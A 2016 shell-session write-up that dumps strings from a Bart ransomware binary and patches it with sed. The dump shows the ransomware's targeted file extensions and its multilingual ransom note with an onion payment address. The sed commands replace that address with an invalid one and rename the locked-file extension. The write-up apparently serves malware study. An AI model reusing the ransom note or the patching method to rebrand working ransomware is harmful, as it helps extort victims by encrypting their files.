#!/bin/sh
#
#  Bart Ransomware (Win32/Filecoder.Bart) (Kidnapping) Resource Hacking
#
#
#  Copyright 2016 (c) Todor Donev 
#  <todor.donev at gmail.com>
#  https://www.ethical-hacker.org/
#  https://www.facebook.com/ethicalhackerorg
#
#
##  Thanks to Maya Hristova that support me.
#
#
#  Description:
#  Bart is a simple yet insidious ransomware 
#  program that locks files in encrypted, 
#  inaccessible archives until a ransom is paid.
#  Bart, like most ransomware programs, searches 
#  for files that match a given description, then 
#  encrypts those files, leaving them unusable. 
#  This means all files of certain extensions (e.g. 
#  .pdf, .xls, etc.) will be inaccessible until 
#  the victim acquires the key. To obtain the key, 
#  the victim must pay a ransom.
#
#  Some of the main features of Bart ransomware 
#  include the following:
#    o  The software enters computer through a ZIP 
#  attachment on an email.
#    o  The attachment contains a JavaScript file 
#  that, if executed, initiates the installation 
#  of Bart.
#    o  Unlike similar malware, Bart locks your 
#  files in encrypted, password-protected ZIP 
#  archives, rendering the files inaccessible. 
#  After the encryption, the naming format 
#  for the resulting ZIP archive is as follows: 
#  original_name.bart.zip.
#
#  Disclaimer:
#  This or previous programs is for Educational 
#  purpose ONLY. Do not use it without permission. 
#  The usual disclaimer applies, especially the 
#  fact that Todor Donev is not liable for any 
#  damages caused by direct or indirect use of the 
#  information or functionality provided by these 
#  programs. The author or any Internet provider 
#  bears NO responsibility for content or misuse 
#  of these programs or any derivatives thereof.
#  By using these programs you accept the fact 
#  that any damage (dataloss, system crash, 
#  system compromise, etc.) caused by the use 
#  of these programs is not Todor Donev's 
#  responsibility.
#   
#  Use them at your own risk!
#  


[todor@adamantium]$ strings bart.bin | grep -i -A 235 "Tahoma"

#   Tahoma
#   Control Panel\Desktop
#   WallpaperStyle
#   TileWallpaper
#   AnOh/Cz9MMLiZMS9k/8huVvEbF6cg1TklaAQBLADaGiV
#   winnt
#   Application Data
#   AppData
#   PerfLogs
#   Program Files (x86)
#   Program Files
#   ProgramData
#   temp
#   Recovery
#   $Recycle.Bin
#   System Volume Information
#   Boot
#   Windows
#   .n64
#   .m4u
#   .m3u
#   .mid
#   .wma
#   .flv
#   .3g2
#   .mkv
#   .3gp
#   .mp4
#   .mov
#   .avi
#   .asf
#   .mpeg
#   .vob
#   .mpg
#   .wmv
#   .fla
#   .swf
#   .wav
#   .mp3
#   .qcow2
#   .vdi
#   .vmdk
#   .vmx
#   .gpg
#   .aes
#   .ARC
#   .PAQ
#   .tar.bz2
#   .tbk
#   .bak
#   .tar
#   .tgz
#   .rar
#   .zip
#   .djv
#   .djvu
#   .svg
#   .bmp
#   .png
#   .gif
#   .raw
#   .cgm
#   .jpeg
#   .jpg
#   .tif
#   .tiff
#   .NEF
#   .psd
#   .cmd
#   .bat
#   .class
#   .jar
#   .java
#   .asp
#   .brd
#   .sch
#   .dch
#   .dip
#   .vbs
#   .asm
#   .pas
#   .cpp
#   .php
#   .ldf
#   .mdf
#   .ibd
#   .MYI
#   .MYD
#   .frm
#   .odb
#   .dbf
#   .mdb
#   .SQLITEDB
#   .SQLITE3
#   .asc
#   .lay6
#   .lay
#   .ms11(Security copy)
#   .ms11
#   .sldm
#   .sldx
#   .ppsm
#   .ppsx
#   .ppam
#   .docb
#   .sxm
#   .otg
#   .odg
#   .uop
#   .potx
#   .potm
#   .pptx
#   .pptm
#   .std
#   .sxd
#   .pot
#   .pps
#   .sti
#   .sxi
#   .otp
#   .odp
#   .wb2
#   .123
#   .wks
#   .wk1
#   .xltx
#   .xltm
#   .xlsx
#   .xlsm
#   .xlsb
#   .slk
#   .xlw
#   .xlt
#   .xlm
#   .xlc
#   .dif
#   .stc
#   .sxc
#   .ots
#   .ods
#   .hwp
#   .602
#   .dotm
#   .dotx
#   .docm
#   .docx
#   .DOT
#   .3dm
#   .max
#   .3ds
#   .txt
#   .CSV
#   .uot
#   .RTF
#   .pdf
#   .XLS
#   .PPT
#   .stw
#   .sxw
#   .ott
#   .odt
#   .DOC
#   .pem
#   .p12
#   .csr
#   .crt
#   .key
#   !!! IMPORTANT INFORMATION !!!
#   All your files are encrypted.
#   Decrypting of your files is only possible with the private key, which is on our secret server.
#   To receive your private key follow one of the links:
#   	1. http://%s.tor2web.org/?id=%s
#   	2. http://%s.onion.to/?id=%s
#   	3. http://%s.onion.cab/?id=%s
#   	4. http://%s.onion.link/?id=%s
#   If all addresses are not available, follow these steps:
#   	1. Download and install Tor Browser: https://torproject.org/download/download-easy.html
#   	2. After successfull installation, run the browser and wait for initialization.
#   	3. Type in the address bar:
#   	   %s.onion/?id=%s
#   	4. Follow the instructions on the site.
#   !!! INFORMAZIONI IMPORTANTI !!!
#   Tutti i file sono criptati.
#   Decifrare dei file ? possibile solo con la chiave privata, che ? sul nostro server segreto.
#   Per ricevere la chiave privata seguire uno dei link : 
#   1. http://%s.tor2web.org/?id=%s
#            2. http://%s.onion.to/?id=%s
#            3. http://%s.onion.cab/?id=%s
#            4. http://%s.onion.link/?id=%s
#     Se tutti gli indirizzi non sono disponibili, attenersi alla seguente procedura:
#             1. Scaricare e installare Tor Browser: https://torproject.org/download/download-easy.html
#             2. Dopo l'installazione di successo, eseguire il browser e attendere l'inizializzazione.
#             3. Digitare nella barra degli indirizzi:
#                 %s.onion/?id=%s
#             4. Seguire le istruzioni sul sito
#   !!! INFORMATIONS IMPORTANTES !!!
#   Tous vos fichiers sont crypt?s.
#   D?chiffrer de vos fichiers est seulement possible avec la cl? priv?e, qui est sur notre serveur secret.
#   Pour recevoir votre cl? priv?e suivre l'un des liens:
#   	1. http://%s.tor2web.org/?id=%s
#   	2. http://%s.onion.to/?id=%s
#   	3. http://%s.onion.cab/?id=%s
#   	4. http://%s.onion.link/?id=%s
#   Si toutes les adresses ne sont pas disponibles, proc?dez comme suit:
#   	1. T?l?chargez et installez Tor Browser: https://torproject.org/download/download-easy.html
#   	2. Une fois l'installation r?ussie, ex?cutez le navigateur et attendez que l'initialisation.
#   	3. Tapez dans la barre d'adresse:
#   	   %s.onion/?id=%s
#   	   	4. Suivez les instructions sur le site.
#   !!! WICHTIGE INFORMATIONEN !!!
#   Alle Ihre Dateien werden verschl?sselt.
#   Entschl?sseln der Dateien ist nur mit dem privaten Schl?ssel, die auf unserer geheimen Server ist.
#   So empfangen Sie Ihren privaten Schl?ssel auf einen der Links folgen:
#   	1. http://%s.tor2web.org/?id=%s
#   	2. http://%s.onion.to/?id=%s
#   	3. http://%s.onion.cab/?id=%s
#   	4. http://%s.onion.link/?id=%s
#   Wenn alle Adressen nicht verf?gbar sind, gehen Sie folgenderma?en vor:
#   	1. Downloaden und installieren Browser Tor: https://torproject.org/download/download-easy.html
#   	2. Nach erfolgreicher Installation der Browser ausgef?hrt wird und f?r die Initialisierung warten.
#   	3. Geben Sie in der Adressleiste:
#   	   %s.onion/?id=%s
#   	   	4. Folgen Sie den Anweisungen auf der Website.
#   	!!! Your personal identification ID: %s !!!
#   	!!! La vostra identificazione personale ID: %s !!!
#   	!!! Votre identification personnelle ID: %s !!!
#   	!!! Ihre pers?nliche Identifikations ID: %s !!!
#   	!!! Su identificaci?n personal ID : %s !!!
#   khh5cmzh5q7yp7th                                    #  DARKWEB ADDRESS: http://khh5cmzh5q7yp7th.onion/
#   .bart                                               #  LOCKED FILE FORMAT: .bart.zip
#   .recover.
#   \\.\
#   recover.txt
#   \recover.bmp
#   \recover.txt
#   notepad.exe "

[todor@adamantium]$ sed -i 's/khh5cmzh5q7yp7th/1234567890123456/g' bart.bin
[todor@adamantium]$ strings bart.bin | grep -i -A 5 "personal"

# 	!!! Your personal identification ID: %s !!!
# 	!!! La vostra identificazione personale ID: %s !!!
# 	!!! Votre identification personnelle ID: %s !!!
# 	!!! Ihre pers?nliche Identifikations ID: %s !!!
# 	!!! Su identificaci?n personal ID : %s !!!
#   1234567890123456                                     # DARKWEB ADDRESS IS CHANGED TO: http://1234567890123456.onion/ (Invalid TOR address)
#   .bart
#   .recover.
#   \\.\
#   recover.txt

[todor@adamantium]$ sed -i 's/.bart/.ethk/g' bart.bin

[todor@adamantium]$ strings bart.bin | grep -i -A 5 "personal"

# 	!!! Your personal identification ID: %s !!!
# 	!!! La vostra identificazione personale ID: %s !!!
# 	!!! Votre identification personnelle ID: %s !!!
# 	!!! Ihre pers?nliche Identifikations ID: %s !!!
# 	!!! Su identificaci?n personal ID : %s !!!
#   1234567890123456                                     # DARKWEB ADDRESS IS CHANGED TO: http://1234567890123456.onion/ (Invalid TOR address)
#   .ethk                                                # LOCKED FILE FORMAT IS CHANGED TO: .ethk.zip
#   .recover.
#   \\.\
#   recover.txt